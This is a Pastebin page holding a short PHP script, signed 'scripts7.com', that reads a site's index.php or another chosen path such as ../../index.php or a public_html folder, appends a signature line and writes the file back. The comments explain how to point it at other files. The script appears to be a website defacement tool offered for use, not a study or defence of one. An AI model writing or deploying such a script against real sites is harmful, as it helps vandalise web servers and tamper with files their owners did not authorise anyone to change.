scripts7com

change and make: index - scripts7.com

Jan 19th, 2016
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.67 KB | None | 0 0
  1.  <?php
  2. #// scripts7.com
  3. #// twitter.com/scripts7com
  4. #// change and make:  index.php to whatever you want
  5. #// you can do :
  6. #// 1 : ../../index.php
  7. #// 2 : /home/user/puclib_html/admin/
  8. #// 3 : /home/user/public_html/index.php
  9. #// BUT MUST BE 755 or 777 otherwise won't work !!!!
  10. #// if there is no file index.php it's gonna make make you one don't worry ;)
  11. $t = 'index.php';
  12. # OR
  13. #$t = '/scripts7.com/';
  14. $x = file_get_contents($t);
  15. # .= means add over and over if you don't want to do over and over, change .= to = but leave it .= better
  16. # type or add whatever between "" to whatever you want
  17. $x .= " Scripts7.com Always and forever \n";
  18. file_put_contents($t, $x);
  19. ?>
Add Comment
Please, Sign In to add comment